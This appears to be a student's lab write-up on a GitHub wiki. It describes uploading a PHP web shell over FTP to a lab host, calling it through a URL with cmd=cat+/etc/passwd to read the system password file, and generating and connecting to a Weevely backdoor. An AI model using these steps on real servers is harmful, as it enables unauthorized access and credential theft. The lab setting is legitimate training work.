Lab 8.1 - zacharylongo/Tech-Journals GitHub Wiki

Deliverable #1:

image

  • To accomplish this I utilized "donttouchme.php"

  • ftp [email protected]

  • lcd (path that to backdoor)

  • cd upload

You should then be able to see the file after running ls

By navigating to http://10.0.5.25/upload/donttouchme.php?cmd=cat+/etc/passwd you should get similar results:

image

  • Using wireshark I was able to find the tcp stream and its contents:

image

Deliverable 2

Using Weevely I created a PHP backdoor: `weevely generate guest om_weeve.php.

I then used the earlier method to upload the new file.

  • Back on my local box I used weevely http://10.0.5.25/upload/om_weeve.php guest to get the desired output.

Deliverable 3:

image

Reflection

I was able to get through this lab with slight diffculty. This difficulty due to rampant syntax issues due to key replacements on my machine. (IE: arrow keys were outputting awsd respectively rather than their desired function).

Besides this, the lab went swimmingly.